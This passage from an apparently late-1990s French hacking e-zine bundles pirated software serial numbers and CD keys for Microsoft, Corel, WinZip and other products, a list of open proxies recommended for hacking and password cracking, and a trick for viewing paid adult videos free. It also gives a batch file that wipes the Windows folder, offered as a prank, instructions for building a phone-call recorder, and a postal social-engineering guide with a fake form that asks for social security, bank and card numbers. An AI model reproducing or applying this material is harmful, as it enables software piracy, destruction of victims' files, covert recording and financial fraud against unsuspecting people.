	         | Name: PhRoZeN CReW	            Code: MPULQSZB  |
	         | Name: United Cracking Force	Code: KNLSMZZO  |
               | Name: Cool Edit	            Code: HAKPMSIS  |
               |________________________________________________|

COOL WAVE EDITOR 1.52: name: tHATDUDE!  s/n: VLLTICVT

COREL CLICK and CREATE pour Zindoz 95: CNC-095U365763
                ___________________
               |DR8XR-0074G719     |
               |DR8XR-A7505549     |
COREL DRAW 8:--|DR8XR-Q2636556     | ( le dernier serial est sûr !)
	         |DR8XR-8296W63372   | ( il faut taper DR8-????-????)
               |DR8-8H35-8G35      | ( les ?? sont à remplacer par les chiffres situés après
               |___________________|   DR8XR- )
                                ________________
                               | CD4-114-654454 |
	                         | CD4-114-647459 |
COREL DRAW 4.0 pour Zindoz:----| CD4-234-345567 |
	                         | CD4-139-512793 |
            	             | CD4-112-698959 |
                               |________________|
                                 ________________
                                | CD5-111-123456 |
	                          | CD5-123-456789 |
COREL DRAW 5.0 pour Zindoz:-----| CD5-050-216533 |
	                          | CD5-D50-819051 |
	                          | CD5-050-082819 |
                                |________________|

COREL DRAW 6.0 pour Zindoz95: 4480-1415-5172
                                   ____________________
                                  | DR7-7296W63372     |
COREL DRAW 7.0 pour Zindoz:-------| DR7-863690R359     |
	                            | DR7-683219552-7-8  |
                                  |____________________|
                                   _________________
                                  | SW-Q023-CF-E    |
COREL FLOW 2.0 pour Zindoz:-------| SAT-507-300794  |
	                            | CF2-123-456789  |
                                  |_________________|

COREL Wordperfect Office 7:	WP7-8Q45777988 ; WP7-37076Q37950
                        __________________________________________________________________
                       | bbs: You!	reg. code: 0082263134165237	s/n: 04080212003        |
DEATH MASTERS 1.02 :---| bbs: Me!	reg. code: 0082263134248005	s/n: 0408026600         |
	                 | bbs: 2U!	reg. code: 0082263134183051	s/n: 0408025093         |
                       |__________________________________________________________________|

DISK CLEANUP 3.1: Name: SiLicon Surfer [PC]   Code: 3858701120

DOS MODEM SERVER: 1101-4806-8272
                        __________________________
                       | DWW200-09785-18274-81530 |
DREAMWEAVER 2.0:-------| DWW200-09785-18274-81630 |
	                 | DWW200-05987-98274-58597 |
                       |__________________________|

DREAMWEAVER 1.0:	DWW100-01183-77026-89349
	                DWM100-08082-87025-214

E-CATCH 2.1: Name: eCatch Regged   Reg.code: 3869B82967AAA61F71A0B0C0F031
                _____________________________
               |  User Name: JuNiOr          |
	         |  s/n: 09RMPJK14X0W95NZZT8A  |
FLASH 2:-------|  User Name: Arnold Hansen   |
	         |  s/n: 00YH2YHY001W3NL161EQ  |
               |_____________________________|

FLASH 3:        FLW300-01567-53532-72983

HALF-LIFE:	2428-22072-5588
	        2857-23271-2349


Hebi 2.1: Name: Riz la+   Key: taghiaa\

Hex Workshop 1.0 pour Zindoz: s/n: 839134729  name: >>> mARQUIS <<<

Hex Workshop 2.20 (b5 32-bit): name: >>> mARQUIS <<<  s/n: JN11mARQ  org: dEUTSCHE bANK aG

Hex Workshop 2.5x: MK121212

HotDog Professional 3.08/3.09:	User Name: PoD
	                        Serial Number: 04TCPYH8102VEMQQM5PF

	                        User Name: Grafx Creations
	                        Serial Number: 0HTM1A4EDY8C8D8DY7MT

HYPERCHAT 3.0:	name: Me!	        bbs: G.!.$	nodes: 3	s/n: zwdubo1yualfk
	            name: You!	        bbs: G.!.$	nodes: 3	s/n: 1ydsow41rm3mlg
	            name: The Pharao	  bbs: Dementia	nodes: 3	s/n: 1etq3v4s84scw
  
LIGHT CHAT 1.00:	name: The GuaRDiaN aNGeL	s/n: 1712260759
	            name: You!	                  s/n: 3790940453
	            name: Me!	                  s/n: 2789669408
	            name: 2U!	                  s/n: 1856485879
	            name: Me	                  s/n: 2482430948

LOL CHAT 2.01:	name: teraphy	        code: 49175491-TERA-PHY!
	            name: Rebels 1997	        code: 5F43AD37-TERA-PHY!
	            name: CKL1997	        code: 1FA7EBF2-CKL!-CKL!



         ET LA PARTIE QUE JE PREFERE ( Brrrr! j'ai des frissons dans le dos ;p

                                     LA SURPRISE DU CHASSEUR :
                                     ------------------------


Micro$oft Autoroute Express 4.0 pour Zindoz: 32098-025-0191712

Micro$oft Excel EIS Builder 1.1 pour Zindoz: 065-501-580

Micro$oft Excel 5.0c pour Zindoz:	01854-055-0504633
	                                15922-020-0012191

Micro$oft Excel 7.0 UK pour Zindoz: 33610-062-0103145

Micro$oft IntelliPoint 1.10 pour Zindoz 95: 37991-025-0514927

Micro$oft Internet Administration Kit: C131756864

Micro$oft Money 97: 425-0153147

Micro$oft Office PRO '95: 27716-102-0128344

Micr$oft Office PRO 4.3c pour Zindoz: 28779-051-0101444

Micro$oft Planner pour Zindoz: 076-051-090

Micro$oft Works 3.0 NL: 16429-020-0000284


Micro$oft Zindoz 95 (OEM):      12095-OEM-0004226-12233
	                          26495-OEM-0004791-53803
	                          15795-OEM-0001355-07757
	                          16595-OEM-0001695-96524
	                          16595-OEM-0001695-96527
	                          30095-OEM-0006161-61513
	                          17295-OEM-0001085-48667
	                          17295-OEM-0001922-52683
	                          15395-OEM-0001292-85449
	                          11495-OEM-0000052-26220

Micro$oft Zindoz 3.11 pour Zindoz: 00131-002-6600743

Micro$oft Visual Basic Standard 4.0 pour Zindoz 95:	411-0356356
	                                                411-0085933
	                                                411-1454815

Micro$oft Visual Basic 4.0 pour C++: 666-6666666

Micro$oft Word 6.0a NL pour Zindoz: 23227-020-0054534

Micro$oft Word 7.0 UK pour Zindoz: 32857-113-0137987

Micro$oft Works 3.0 MultiMedia Edition: OEM-MMWRKS300

Micro$oft Works 3.0a NL: 16429-020-0000284

Micro$oft Works 4.0b pour Zindoz 95: 33977-053-0111756

Micro$oft Zindoz 95 CDKey s/n:	875-7215850
	                              100-1208613
	                              757-2573155
	                              727-0208693
	                              767-0602634
	                              747-1012622
	                              988-0529930
	                              511-1103646
	                              889-9850114
	                              975-4769754
	                              040-2260882

Micro$oft Zindoz 95 (OSR 2)  Version Francaise:	23095-OEM-0003846-08330
	                                          32796-OEM-0016824-74833
	                                          29896-OEM-0016331-51135
	                                          29896-OEM-0016331-51205
	                                          26496-OEM-0015366-06887

Micro$oft Zindoz 95 Advisor 1.0 pour Zin95:	002-473
	                                          002-794
                                                086-215

Micro$oft Zindoz 95 CD-ROM Plus!: CD-key s/n:	040-0073635
	                                          040-0081471
	                                          040-0081586
	                                          040-0081589
	                                          040-0364433
	                                          040-0594361
	                                          040-0333015
	                                          040-0114645
	                                          121-0101264
	                                          025-0067276
	                                          040-0043597

Micro$oft Zindoz 95 OSR 2:	15795-OEM-0001355-07757
	                        17095-OEM-0001814-48938
	                        25796-OEM-0014977-53852
	                        20796-OEM-0013827-39524
	                        26496-OEM-0015404-84903
	                        20195-OEM-0002516-95789

Micro$oft Zindoz 98:	K4HVD-Q9TJ9-6CRX9-C9G68-RQ2D3
	                  HGBRM-RBK3V-M9FXV-YCXDK-V38J4

Micro$oft NT 4.0 Workstation: 425-1921701


                        ET VOILA POUR MICROSOFT ( Billou = Fucker ! )

                      ( qlq'un à-t-il des sérialz pour Zindoz 98 ? Merci ! )

                                  VOUS EN VOULEZ ENCORE ???

                     LA PROCHAINE FOIS PROMIS, JURE, CRACHE (pttouuhhh !!!)

                       JE VOUS LE JURE SUR LA TETE DE BILLOUZ...

                            



	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
  	         *** LES PROXIES ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


	Merci à ToBoZo pour son aide et tous les "anonymes" qui ont cherché des proxies pour cet
article. J'ai pris la liste dans Hackoff 18.


*** Qu'est-ce qu'un proxy ? ***

      Un proxy est un obstacle entre votre bécane et un serveur web, il permet de masquer votre
adresse IP lorsque vous aller sur un site ou sur IRC (voir l'article sur le spoofing sur mIRC
dans la première comète de REVOLUTION). 

     	Sans rentrer dans des détails techniques, lorsque vous passez par un proxy, vous entrez
sur son système (un peu comme si vous le hackiez), et vous pouvez surfer en passant par lui,
de sorte que vous utilisiez son IP. 

     	On peut bien sûr vous retracer si vous passez par un proxy, puisque le proxy loggue votre
IP lorsque vous l'utilisez (s'il ne le faisait pas, vous ne pourriez pas l'utiliser), mais pour
ça, il faut engager de longues procédures, et si vous vous connectez sur un proxy via un autre
proxy et ainsi de suite en formant de longues boucles (genre en repassant 30 fois par les mêmes
proxies), on aura beaucoup de mal à vous retrouver.


*** Dans quels cas les proxies sont-ils utiles ? ***


     Les proxies sont utiles dans tous les cas de hack ou de tests de failles de sécurité : 
connexion à un serveur pour pirater un site qu'il héberge, test de failles CGI (voir plus haut),
cracking de mots de passe, etc...


*** Liste des proxies ***


Code   Fournisseur 				URL			     	Port 		Protocole 

AE  	Emirates.Net 		proxy.emirates.net.ae/proxy.pac 	-		AUTOCONFIG  
AR  	Broggio	 		gopher.broggio.com.ar 			80  		HTTP/FTP  
AT  	Tecan 			www-proxy.tecan.co.at 			8080  	HTTP/FTP  
AU  	TAS	 			www2.transport.tas.gov.au 		80  		HTTP/FTP  
AU  	Schools 			proxy.schools.net.au 			3128 		HTTP/FTP  
BR  	CTelecom 	 		proxy.cybertelecom.com.br 		8080  	HTTP/FTP  
BR  	Overnet	 		vectra.overnet.com.br 			3128  	HTTP/FTP  
CA  	Csjlor 			www.csjlor.qc.ca 				8080  	HTTP/FTP  
CA  	Clasalle	  		acces.clasalle.qc.ca 			8080  	HTTP/FTP  
CH  	Cern  			web-cache-2.cern.ch 			8080  	HTTP/FTP  
CH  	UniSg 			sigma.unisg.ch 				3128  	HTTP/FTP  
CO  	Compunet	  		proxy.compunet.net.co 			3128  	HTTP/FTP  
CZ  	Cuni	 			hamster.ms.mff.cuni.cz 			8080  	HTTP/FTP
CZ  	Vutbr 			lyn.zlin.vutbr.cz 			8080  	HTTP/FTP  
COM  	RR	  			proxye1-atm.maine.rr.com 		8080  	HTTP/FTP  
COM  	McMail	 		proxy.mcmail.com 				8080  	HTTP/FTP  
COM  	Ludexpress	 		yogsothoth.ludexpress.com 		8080  	HTTP/FTP  
DE  	HtwkL  			zeus.rz.htwk-leipzig.de 		80  		HTTP/FTP  
DE  	Siemens 			ramses.erlm.siemens.de 			80  		HTTP/FTP  
DE  	U-Rb.  			rrznw6.rz.uni-regensburg.de		8080		HTTP/FTP  
EDU  	Berkeley 			smorgasbord.ICSI.Berkeley.EDU 	8080  	HTTP/FTP  
EDU  	PurdueNC 			Brahma.CC.PurdueNC.Edu 			8080  	HTTP/FTP  
FI  	Inet 				proxy.inet.fi 				800  		HTTP/FTP  
FI  	TPU 				proxy.cs.tpu.fi 				80  		HTTP/FTP  
FR  	AC 				ppar.ac-bordeaux.fr 			8080  	HTTP/FTP  
GOV  	Dgs 				wall-14.dgs.ca.gov 			80 		HTTP/FTP  
IT  	TO  				www.focos.to.it 				3128  	HTTP/FTP  
IT  	Lcnet 			mail.lcnet.it 				8080  	HTTP/FTP  
JP  	K-K  				lip.kobe-kosen.ac.jp 			8080  	HTTP/FTP  
JP  	Fukuoka 			kusu.city.kurume.fukuoka.jp 		8080  	HTTP/FTP  
KR  	Kyunghee 			cvs2.kyunghee.ac.kr 			8080  	HTTP/FTP  
KR  	Taegu 			biho.taegu.ac.kr 				8080  	HTTP/FTP  
MIL  	Dla 				cani.dla.mil 				8080  	HTTP/FTP  
MIL  	OSD 				pgwcm.otd.osd.mil 			80  		HTTP/FTP  
MIL  	Navy 				gatekeeper.jag.navy.mil 		80  		HTTP/FTP  
MIL  	USMC 				gate1.yuma.usmc.mil 			80  		HTTP/FTP  
NET  	Deltacom 			cacheflow1.deltacom.net 		8080  	HTTP/FTP  
NET  	Coqui 			proxy.coqui.net 				80  		HTTP/FTP  
NL  	Nhtv 				proxy.nhtv.nl 				8080  	HTTP/FTP  
NL  	Tebenet 			www.tebenet.nl 				8080  	HTTP/FTP  
ORG   Londonderry 		www.londonderry.org 			8080 	 	HTTP/FTP  
ORG   Aclin 			aclin.org 					8080  	HTTP/FTP  
PH  	EMC 				ascaris.emc.com.ph 			8888  	HTTP/FTP  
PH  	Info 				mail2.info.com.ph 			3128  	HTTP/FTP  
PT  	Isec 				leonardo.isec.pt 				8080  	HTTP/FTP  
PT  	Teleweb 			caclis01.teleweb.pt 			3128  	HTTP/FTP  
PY  	Infonet 			ns1.infonet.com.py 			8080  	HTTP/FTP  
QA  	Qatarnet 			proxy.qatar.net.qa 			8080  	HTTP/FTP  
SE  	Varnamo 			ns.varnamo.se 				8080  	HTTP/FTP  
TR  	Turnet 			proxy1.turnet.net.tr 			8080  	HTTP  
TR  	Turnet 			proxy2.turnet.net.tr 			8080  	HTTP  
TW  	IS 				c1.h202052106.is.net.tw 		80  		HTTP/FTP  
TW  	Golden 			club.golden.com.tw 			8080  	HTTP/FTP  
UK  	Ondemand 			cache1.ondemand.co.uk 			8080  	HTTP/FTP  
UK  	LUT 				double-panic.lut.ac.uk 			8080  	HTTP/FTP  
US  	K12 				stpauls.pvt.k12.al.us 			8080  	HTTP/FTP  
US  	Oh  				websense.gcpl.lib.oh.us 		8080  	HTTP/FTP  
ZA  	New 				cache.new.co.za 				8080  	HTTP/FTP  
ZA  	Global 			cache02.global.co.za 			3128  	HTTP/FTP  
ZW	Cybergate 			proxy.cybergate.co.zw 			8080  	HTTP/FTP  
ZW	Africaonline  		proxy.africaonline.co.zw 		8080  	HTTP/FTP 



	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
  	      *** BIERE A PAS CHER ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°

	Merci à Nairolf qui a expliqué cette technique dans un numéro de CYBz, l'e-zine où j'ai 
pris cette technique où j'ai pris cette technique, et édité par le gars du même nom (CYBz, pour
les neu-neux qu'auraient pas compris).


      Tout le monde à dans son entourage un bon gros pilier de bar qui a un petit pois à la 
place du cerveau, mais qui se croit malin et qui est très orgueilleux...

      Ben allez voir ce type lorsqu'il sera dans son bar favori et attendez qu'il commande sa 
pinte de Kanter (ou de Kro, ça dépend du laron).

      Prposez-lui un pari : "Je te parie 5 francs que je te bois ta bière en moins de 6 
secondes !" ; lui, forcément, il acceptera, vu que lui-même n'en es pas capable...

      Buvez donc votre bière pénard pendant qu'il compte les secondes...

      C'est sûr, vous allez perdre votre pari et le pilier de bar vous demandera vos 5 francs,
mais pensez que lui, sa bière, il l'aura payée dans les 15 balles...

      Narf ! Come dit le proverbe : "Y'a pas de petites économies !" :o) 






	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
     		*** SERIAL FORCE TWO ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
                                     

  	VOUS AVEZ ENCORE FAIM ???
      


Opera 3.00: 1234B3KY2pb4

Opera 3.20: 1234B3KY2pb4 ( et peut être les versions sup ! )

Password Keeper 3.5: Name: SiLicon Surfer [PC]   Code: 338075451

PC Security 3.5: NAME: CRowmAN   SERIAL: 504D3ED105

PC Security 3.5: Name: Sonixx [AnThraX]   Key: 9A85CD9D38

PChat 1.21b:	name: The GuaRDiaN aNGeL	    key: TRVAENVPCO16KUAOPMQV
	            name: TeLLeRBoP	                key: L02CU83GKI91BNOMSVNM
	            name: You!	                      key: IBEP0IQG5OMML8BJOSSK
	            name: Me!	                      key: EIHKI5MMUBSE7GI87PMS

PSX Video pour Zindoz 95 1.03: 1AMX0JEUZD

PSX Video 1.20: User name : ThE hUnT !  
                Registration code: NVPS!GVLMS

Publisher 98 Deluxe Edition: 8156-2883957

Quick Time Pro: Name: John A. Haverty   Serial: 3FDF-F69E-5A79-9088-BD63

REALPLAYER G2: Serial Number: 0116011061
               Serial Number: 1016001161
               Serial Number: 1600001610
               Serial Number: 0610060101

SoftICE pour Zindoz 95 3.0: 2110-00617F-77

SoftICE pour Zindoz 3.1 16bits: 14000181

SoftIce Zindoz NT 1.0, 1.05 : 3000-9147F5-77

StartClean 1.2 pour Zindoz:	name: The GuaRDiaN aNGeL	    s/n: 3088-29926-1673-333
	                        name: TeLLeRBoP	                s/n: 1660-15646-1761-349
	                        name: Me!	                      s/n: 528-4326-727-161
	                        name: ED!SON	                s/n: 926-8306-1717-341
	                        name: romeo '97	                s/n: 1564-14868-1211-249


StuffIt Deluxe 1.01: A 09000

Sunsoft Java Workshop 1.0:	JWS100-DAAESU-906052896
	                        JWS100-JS1212-119673481
	                        JWS100-PC9797-666666676

TurboCAD 2.03: MBW400R1109394-244

Ultisoft 3D Uz 3.06: 724913

Unisyn Chat 97: 36332586

Vermillion FTP server 1.12; 1.14:	  line 1: "Nuthouse"
	                                line 2: "BBNCy BpDjS [r84. koRXp"

Vertigo 3D Words: YVR-5725-NJ087-ABN

Visual Java: 070-3746215

Wav convert Pro 2: O4WPA2869

Web Expander 2.22: Name: The Master DaVinci   s\n: fe11ax

WebExpert v2.50a+:    name: N.. and O.. and P (blacklist suxx)
	                ser#: X6XYKY-V63B3F-5CHYQ8-VJHB7U

	                name: Hi Bleetz, i saw u in the blacklist
	                ser#: HLTFNU-HFVZHU-3LVMAM-QBDY72

	                name: Version gratuite
	                ser#: TF9BDU-V4NFQU-AFN6VB-5ZQ2DJ

	                name: Freeware Version
	                ser#: TM96EF-96TF9B-DFKCEZ-XW7R5L        

Win On Cd 3.0: 00646-94014548K

Win On CD TOGO! 4.0: 00646-80582605h

Win RAR 2.02: name: Steve Hsu   s/n: C04FFE5BADC5B6

WinAmp 2.5:	Name: WinAmp	                Reg code: 85265927
	      Name: Pretty Good Piracy	    Reg code: 66127111

WarezWolf 1.05.000: name: MCVD 1997   s/n: WW-109806


WinHacker 95 2.01: name: Clark Kent  company: Daily Planet  s/n: f023-1581c7


WinZip 6.0:	name: Jan Klaassen	s/n: 6AE91A21
	      name: Bi$0 from Koruña	s/n: E91A2F9F

WinZip SelfExtractor 2.0:	name: teraphy	                code: 307421
	                        name: Phrozen Crew 1997           code: 722477

WinZip 6.x pour Win95: 	name: The GuaRDiaN aNGeL	    s/n: 51ED30A6
	                  name: TeLLeRBoP	                s/n: 2BB10C24
	                  name: You!	                      s/n: F35C01BC
	                  name: Misha	                      s/n: E64E040B
	                  name: WINZIP	                s/n: BA0C04A7
	                  name: Duckman	                s/n: C6A008A9
	                  name: John Wayne	                s/n: AED0114E
	                  name: SPECIAL COPY	          s/n: 9E9F1286

WinZip 6.3: name: ThE hUnT ! s/n(winzip): 664A0BA4      code(self-extractor): 310569



                         VOILA C'EST FINI (pour cette fois !)
           J'espere que vous avez trouvé ce que vous cherchiez, sinon mailez moi !

                  ALLEZ ! JE VAIS ENCORE CHASSER, J'AI UNE P'TITE FAIM....;)
                     

                              << LA CHASSE EST OUVERTE !! >>





	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
     *** LES VIDEOS DE CUL SEXY CHANNEL ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°

	Eh ouai encore une astuce pour des trucs de culs qui sont normalement payants, mais qui 
deviennent gratuit avec moi !!!!

	Bon, les CD SEXY CHANNEL sont distribués gratuitement par E-WAY.

	E-WAY est une putain de société qui édite des "TELWARES"... MAIS C KOA CA 1 TELWARES ???

	Des " TELWARES ", c'est des logiciels qui sont bridés, un peut comme des sharewares, sauf 
que la pour payer le soft, on passe par le ( putain ! ) de minitel, style 5 Frs la minute :(
et au bout de 30 minutes de barratin, ils te files enfin une clé de débridage, ca semble simple 
sauf que ces connards ( je hais le minitel ! ), ils te files une clé mais on en à besoin souvent
de plusieurs, et c'est repartis pour une demi-heure de tchatche et de pub :((((((( 

	Au bout du compte, t'en a pour 200 balles, un soft de merde que tu croyais avoir pour 10 
francs....VOILA L'ARNAQUE !

	Revenons à ces cons d'E-WAY !

	Les progs qui ont créés ce CD de cul (qui à de bonnes vidéo ;)), ont été tellement con, 
que lorsqu'ils ont programmer c'te merde....ba...ils en ont mis partout...

	Je ne sais pas comment voir les photos (allez voir sur : www.crackfr.com !), mais je sais
par contre comment visionné les vidéos de culs gratis !!!!!!

	Y'a rien de plus simple :

	Explorer le contenu du CD, et trouver le dossier qui contient des fichiers avec 
l'extension (*.mok)...CA Y EST ? VOUS L'AVEZ 

	Bon, alors faut avoir un p'tit peut d'espace libre sur son disque dur ( style 10Mo )

	Vous copiez, sois tout les fichier *.mok sois un par un ( comme tu le sens ! )

	Puis, tout betement tu change l'extansion en *.avi

	Et pis voila ! SIMPLE NON ? MERCI CONNARD D'E-WAY ! AAArrrrffff ;p  

	On dirait que les progs avaient fumé avant d'écrire, ou étaient ils trop occupés à ce 
branler devant leurs vidéos......




	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
  	   *** FAIRE UN FICHIER .BAT ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


  	Faire un fichier .bat est une chose très simple, pourvu qu'on ait au moins un doigt pour
taper sur son clavier, un oeil pour voir ce qu'on écrit et un cerveau pour connaître un peu le 
Ms-Dos.

      En guise d'introduction, voici quelques commandes Ms-Dos de base :

echo off : désactive l'affichage de ce qui se passe

dir : affiche le contenu du répertoire désigné 
(ex : "dir c:\windows" affiche le contenu de c:\windows) 

del : efface tous les fichiers du répertoire désigné
(ex : "del C:\WINDOWS\*.exe" efface tous les fichiers .exe de c:\windows)

echo. : saute une ligne

echo : affiche ce qui est écrit après [echo]
(ex : "echo fuck you" affiche "fuck you"> 

cls : efface l'écran

pause : demande d'appuyer sur un touche pour continuer


      Donc voici le genre de fichiers .bat plutot pas gentils du tout que l'on peut faire très
vite sans se casser la tête :

echo off
echo This programm is created by Redoxx
pause 
del C:\WINDOWS\*.*
dir C:\WINDOWS\ 
echo YoU h4v3 b33n h4x0r3d !!!
cls


      Bon, ben je vous laisse faire joujou avec ça, mais sachez quand même que c'est hyper 
connu, donc faites pas le malin avec un autre hacker en lui envoyant ça, parce que je ne pense
pas que le monsieur ou la madame apprécierait la plaisanterie, et il risquerait de se comporter
assez méchamment avec vous, avec une tendance sadique de nature maniaco-dépressive jumelée à
une nature hyper-impressionnable donc supra-impulsive qui ne pourrait que vous nuire. 






	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
  	    *** FAIRE UNE CRAP-BOX ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


*** A quoi sert une Crap-Box ? ***

      Une Crap-Box ne sert qu'à une seule chose : enregistrer une conversation téléphonique.
C'est pas grand-chose, mais ça peut toujours être utile dans certains cas...


*** Quel matériel pour faire une Crap-Box ? ***

- un téléphone
- des fils
- une pince à dénuder ou un cutter
- un tournevis
- un dictaphone
- un fer à souder
- un adapteur d'écouteur (à relier au système de son ou dans le lecteur CD)

      
*** Comment procéder ? ***

      1°) Avec le tournevis, ouvrir délicatement le combiné du téléphone sans rien casser ; 
vous devriez voir une petite plaque où les 2 fils de l'écouteur et les 2 fils du micro se 
rejoignent pour pouvoir brancher le fil du téléphone.

      2°) Prendre 4 fils de couleurs différentes (pas nécessaire, mais plus pratique) et de 
même longueur, et les souder sur les 4 places de la plaque où les fils ce rejoignent, en prenant
bien garde qu'aucun fil n'en touche un autre.

      3°) Rassembler un fil de l'écouteur avec un du micro faire de même avec les 2 autres fils.
Ainsi, vous aurez un pôle de l'écouteur et un du micro sur un groupe de fils et les autres pôles
sur l'autre groupe.

      4°) Souder un des groupes de fils à un fil de l'adaptateur d'écouteur et faire pareil avec
l'autre groupe (si l'adaptateur a quatre fils, les mettre deux par deux).

      5°) Brancher l'adapteur sur le dictaphone.

      Ainsi, quand vous téléphonez et que vous voulez enregister la discut', appuyez sur "Rec". 



	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
 *** BIDOUILLAGES SUR TELEPHONES PORTABLES ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


*** Obtenir l'IMEI d'un portable ***

      Ben ça, c'est un truc tout con qui, je pense, marche sur tous les portables, mais bon, je
ne garantie rien (je sais que ça marche sur les Nokia, les Ola, les Sagem et sur le Motorola
StarTAC).

      Juste à titre d'info, l'IMEI d'un portable sert à le tracer, donc avoir le sien n'est pas
particulièrement utile, sauf si on sait le changer (si vous savez le faire, expliquez-moi, ce
serait cool), mais si on a celui d'un autre et le matériel nécessaire, ben on peut jouer au
petit militaire de la DGSE et tracer son portable.

      En fait, il suffit d'allumer votre cellulaire, de rentrer le code PIN et de taper sur les
touches * # 0 6 # et, normalement, l'IMEI s'affiche. 


*** Un menu secret ***

      Ce truc, c'est un machin tout bizarre que j'ai testé sur le Sagem 800 d'un pote, mais je
ne sais pas s'il marche sur les autres téléphones, mais essayez quand même sur le votre, on ne
sait jamais. 

      Il suffit d'allumer le téléphone, taper le code PIN, entrer dans le menu du portable et
taper sur la touche * et, si tout se passe bien, un menu secret apparaît. 

      Sur le Sagem de mon pote, je suis arrivé sur un fichier où on trouvait l'IMEI et d'autres
infos dans ce style. 




	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
  	   *** LE SE PAR SNAIL MAIL ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°

     
	Le Snail Mail, c'est du Social Enginnering où l'on se sert de la poste comme moyen 
d'action.

      Je pense personnellement que c'est très utile, car c'est facile, par cher et on obtient 
de bons résultats. 

      En effet, il n'existe pas un seule entreprise, aussi informatisée soit-elle, où il n'y a 
pas des tas de paperasses à remplir. Et, du moins c'est mon avis, à force de remplir paplard 
sur paplard, l'employé moyen ne fait plus gaffe à ce qu'on lui demande et, de toute manière, 
il y a de plus en plus de gens qui ne font confiance qu'aux informations écrites, parce que 
comme dit le proverbe : "les paroles s'envolent, les écrits restent".

      Et vu que notre société devient de plus en plus conne et que l'administration suit le 
mouvement de connerie progressive et générale, on vous demande tout et n'importe quoi pour une 
simple incription à la médiathèque de votre ville, donc vous pouvez vous aussi demander un tas 
d'info lors de votre attaque au SE... Kewl !!! ;-P


*** Soigner son attaque ***

      Si votre cible reçoit en guise de courrier une feuille cadrillée où il est écrit au 
crayon dans un français approximatif, même si elle est plus conne qu'un fachiste trisomique, 
il y a peu de chances qu'elle croit à votre histoire.

      Donc il vous faudra quand même un minimum de matos, c'est à dire des enveloppes propres 
et pas froissées, des timbres qui ne ressemblent pas à des papiers de chewing-gums trainant dans
une poche depuis 3 semaines, du papier d'assez bonne qualité (c'est con pour la nature et 
Dominique Voynet, mais ne prenez pas de papier recyclé), une bonne imprimante, et quelques 
talents de créateur artistique.

      En effet, il vous faudra faire au moins un logo pour votre société d'emprunt, et il vous 
faudra le mettre sur vos enveloppes en haut à gauche de la face frontale (là où vous marquez 
l'adresse) et sur votre papier à lettres.

      Ensuite, il vous faudra trouver un nom pour votre société d'emprunt, mais ne prenez pas 
un truc du genre "Jean-Kevin LeBoulet & Cie" ni l'autre extrême "Star Entairtainment Society", 
parce que nous, on est francophones et civilisés, donc ne faites pas dans le bouseux ni dans le 
grand groupe international (surtout qu'en général, un grand groupe international, c'est connu).

      Si vous pouvez faire des étiquettes pour marquer les adresses de vos cibles, ça le fera 
encore plus et vous n'en serez que plus crédible.

      Enfin, afin d'éviter tout risque de vous faire niquer à cause de votre adresse et de 
faire plus pro, il vous faut soi une boîte postale (si vous êtes plusieurs, partagez les frais),
soi une adresse dans une Z.I (Zone Industrielle). Pour ça, il vous faudra de la chance, parce 
qu'une entreprise désaffectée dans une Z.I, on n'en trouve plus beaucoup.

      En clair et en résumé : pour être crédible au maximum, il faut que vous ayez l'air pro au 
maximum. 


*** Choisir sa cible ***

      Dans le cas du SE par snail mail, on peut s'attaquer à une énorme tranche de population,
pour faire un peu comme un sondage. Il faut que la lettre ressemble à un truc stéréotypé que 
vous envoyez à des milliers de gens, comme une mailing-list qui passe par les PPT au lieu de 
passer par le Web.


*** Le design du formulaire ***

      Si vous voulez que votre attaque soit vraiment efficace, il faut que vous fassiez des 
formulaires qui se remplissent vite, un peu dans le genre de formulaire d'inscription à une 
association, et avec un police "pro", pas de polices du genre Comic sans MS ou Elegant !!! 

      Demandez vos infos dans un ordre "logique", ne demandez pas d'entrée le numéro de Secu ou 
le numéro de carte de crédit.

      Enfin, la règle d'or toute con : ne faites pas de fautes d'orthographe !!!

      Ensuite, envoyez vos formulaires et attendez.

      S'il vous manque des infos, n'hésitez pas à téléphoner à votre cible en vous faisant 
passer pour un employé de votre société d'emprunt.

     	
*** Schéma d'un formulaire ***


<Logo de votre société d'emprunt>
<Nom et adresse de votre société d'emprunt>

									<Date de l'envoi>


			<Titre du formulaire en gros, majuscule et gras>



	Madame, Monsieur, 

	<Prétexte du formulaire>

	Veuillez donc remplir le formulaire suivant et nous le retourner à <adresse>


		Nom et Prénom : ______________________________________________
		             _          _
		Sexe :      |_| M      |_| F (nom de jeune fille : __________ )
		
		Adresse : ____________________________________________________

		______________________________________________________________
				
		N° de téléphone : |_|_|  |_|_|_|_|_|_|_|_|

		Date de naissance : |_|_|/|_|_|/|_|_|_|_|
	                               _
		Situation familiale : |_| Célibataire
					     _ 	
					    |_| Marié(e)
					     _
					    |_| Divorcé(e)
					     _
					    |_| Veuf(ve)
                                    _	      _	    _	  _     _
		Nombre d'enfants : |_|Aucun  |_|1  |_|2  |_|3  |_|4 ou plus

		N° de sécurité sociale : _____________________________________

		Banque : _____________________________________________________

		Numéro de carte bleue : |_|_|_|_| |_|_|_|_| |_|_|_|_|


		
		Nous vous adressons nos sincères salutations,

									<Nom d'emprunt>
									  <Signature>




	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
 *** VOIR TOUT LE CONTENU DES MICROCHARME'S ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°

	Eh ouai c encore moi !

	Et j'ai encore des astuces pour ces merdes de CD de Q crypté, que l'on peut décrypter par 
minitel (500 Frs ;p).

	Cette astuce m'a été donnée gracieusement par zegzeg (que je salut au passage !) sur un 
